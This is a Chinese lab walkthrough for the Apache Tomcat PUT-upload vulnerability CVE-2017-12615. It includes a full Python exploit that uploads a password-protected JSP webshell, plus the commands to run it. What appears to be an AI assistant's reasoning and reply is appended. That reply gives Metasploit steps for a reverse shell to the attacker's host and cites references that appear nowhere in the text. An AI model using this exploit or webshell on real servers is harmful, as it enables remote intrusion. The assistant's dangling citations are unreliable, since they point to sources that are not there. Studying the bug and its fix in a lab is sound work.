Tomcat远程代码执行漏洞(CVE-2017-12615)

实验环境

操作机:windows XP

IP:172.16.11.2

目标机:windows server 2003

IP:172.16.12.2

实验目的

了解Tomcat远程代码执行漏洞危害

掌握检测利用Tomcat远程代码执行漏洞的能力

实验工具

Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器

实验内容
Tomcat

Tomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apache软件基金会(Apache SoftwareFoundation)的Jakarta项目中的一个核心项目,由Apache、Sun和其他一些公司及个人共同开发而成。

漏洞介绍

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)当存在漏洞的Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行,危害十分严重。

漏洞分析:
在Tomcat安装目录下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示Tomcat已开启PUT方法

<init-param> 
      <param-name>readonly</param-name> 
      <param-value>false</param-value> 
</init-param>

然后我们就可以通过PUT方法直接上传一句话木马
修复方案

用户可以禁用PUT方法来防护此漏洞,操作方式如下:

在Tomcat的web.xml 文件中配置org.apache.catalina.servlets.DefaultServlet的初始化参数

<init-param>
<param-name>readonly</param-name>
<param-value>true</param-value>
</init-param>

确保readonly参数为true(默认值),即不允许DELETE和PUT操作。
实验步骤
top 1:访问目标网站
在浏览器的地址栏输入我们的目标网站地址172.16.12.2:8080
这里写图片描述
查看版本知道存在远程代码执行漏洞

top 2:下载payload,内容如下:

#! -*- coding:utf-8 -*- 

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''

try:

    conn = httplib.HTTPConnection(sys.argv[1])

    conn.request(method='OPTIONS', url='/ffffzz')

    headers = dict(conn.getresponse().getheaders())

    if 'allow' in headers and \

       headers['allow'].find('PUT') > 0 :

        conn.close()

        conn = httplib.HTTPConnection(sys.argv[1])

        url = "/" + str(int(time.time()))+'.jsp/'

        #url = "/" + str(int(time.time()))+'.jsp::$DATA'

        conn.request( method='PUT', url= url, body=body)

        res = conn.getresponse()

        if res.status  == 201 :

            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]

            print 'shell:', 'http://' + sys.argv[1] + url[:-1]

        elif res.status == 204 :

            print 'file exists'

        else:

            print 'error'

        conn.close()

    else:

        print 'Server not vulnerable'

except Exception,e:

    print 'Error:', e

top 3 利用payload对目标网站发起攻击
下载完后payload命名为exp.txt
进入cmd界面,然后切换到exp.txt文件目录下,
接下来输入命令:

python exp.py 172.16.12.2:8080

运行,程序返回webshell的地址

http://172.16.12.2:8080/1506412001.jsp

注意:此处1506412001.jsp为随机生成地址,请以实际获取的shell为准

在火狐浏览器中按F9打开hackbar插件,执行以下命令

http://172.16.12.2:8080/1506412001.jsp?&pwd=023&cmd=ipconfig

这里写图片描述
输入如下指令,得到:

http://172.16.12.2:8080/1506412001.jsp?&pwd=023&cmd=ipconfig

这里写图片描述

结果分析:
当存在漏洞的Tomcat运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行。因此,通常情况下我们应该不允许DELETE和PUT操作。

<think>好的,我现在需要帮用户查找关于如何使用Metasploit Framework(MSF)对CVE-2017-12615漏洞进行渗透测试的方法。首先,我需要确认CVE-2017-12615是什么漏洞。根据记忆,这是一个Apache Tomcat远程代码执行漏洞,影响版本是Tomcat 7.0.0到7.0.79,当启用HTTP PUT方法时,攻击者可以上传恶意JSP文件,导致远程代码执行。 接下来,用户需要的是利用MSF进行攻击的教程。我记得MSF中有现成的模块可以用来利用这个漏洞。可能需要查找对应的模块名称,比如exploit/multi/http/tomcat_jsp_upload_bypass。然后,用户需要知道如何配置参数,比如设置RHOSTS(目标IP)、RPORT(端口,默认8080)、TARGETURI(路径),以及上传的JSP payload。 另外,用户可能需要生成payload,比如使用msfvenom生成反向shell的JSP文件,或者直接使用MSF内置的payload。需要确保用户了解如何设置监听器,处理防火墙或杀毒软件的问题,以及漏洞利用的前提条件,比如目标服务器是否启用了PUT方法,是否有写权限等。 还需要注意引用相关的资料,比如用户提供的引用中有提到其他CVE的复现,虽然没有直接提到CVE-2017-12615,但可以类比说明使用MSF的一般步骤。例如,引用[1]提到使用模块路径,引用[3]提到MSF的模块使用和启动方式,这些都可以作为参考。 此外,用户可能需要了解如何验证漏洞是否存在,比如手动发送PUT请求测试,或者使用nmap脚本检测。最后,提醒用户遵守法律,仅在授权环境下进行测试,并建议修复方案,比如升级Tomcat版本或禁用PUT方法。 现在需要将这些步骤结构化,用中文清晰回答,确保LaTeX格式正确,生成相关问题,并在适当位置添加引用标记。同时检查是否有遗漏的细节,比如模块的具体配置步骤,常见错误处理等,确保回答准确可靠。</think>### 使用Metasploit Framework (MSF)CVE-2017-12615漏洞的渗透测试方法 CVE-2017-12615是Apache Tomcat的一个远程代码执行漏洞,影响Tomcat 7.0.0至7.0.79版本。当服务器配置允许HTTP PUT方法时,攻击者可通过上传恶意JSP文件实现代码执行[^1]。 #### 步骤说明 1. **环境准备** - 确保已安装Metasploit Framework(建议使用Kali Linux或最新版MSF)。 - 启动MSF数据库服务: ```bash msfdb init && msfdb start ``` 2. **查找并加载漏洞模块** ```bash msf6 > search CVE-2017-12615 msf6 > use exploit/multi/http/tomcat_jsp_upload_bypass ``` 3. **配置参数** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set RHOSTS <目标IP> msf6 exploit(tomcat_jsp_upload_bypass) > set RPORT 8080 # Tomcat默认端口 msf6 exploit(tomcat_jsp_upload_bypass) > set TARGETURI / # 目标路径 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpUsername <用户名> # 若需认证 msf6 exploit(tomcat_jsp_upload_bypass) > set HttpPassword <密码> ``` 4. **选择Payload** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > set payload java/jsp_shell_reverse_tcp msf6 exploit(tomcat_jsp_upload_bypass) > set LHOST <攻击机IP> msf6 exploit(tomcat_jsp_upload_bypass) > set LPORT 4444 ``` 5. **执行攻击** ```bash msf6 exploit(tomcat_jsp_upload_bypass) > exploit ``` #### 关键注意事项 - **漏洞验证**:手动发送PUT请求测试是否允许上传文件: ```bash curl -X PUT http://<目标IP>:8080/test.txt -d "test" ``` - **绕过限制**:通过构造特殊文件名(如`shell.jsp%20`)绕过Tomcat的防护机制。 - **防护措施**:升级Tomcat至7.0.80+或禁用PUT方法(修改`web.xml`配置)[^3]。 #### 引用说明 - 漏洞利用模块路径参考了Metasploit模块管理逻辑[^1]。 - 监听器配置与Payload生成方法类似CVE-2017-8759的HTA脚本利用流程[^2]。 - MSF基础操作(如模块加载、参数设置)参考了永恒之蓝漏洞的复现步骤[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值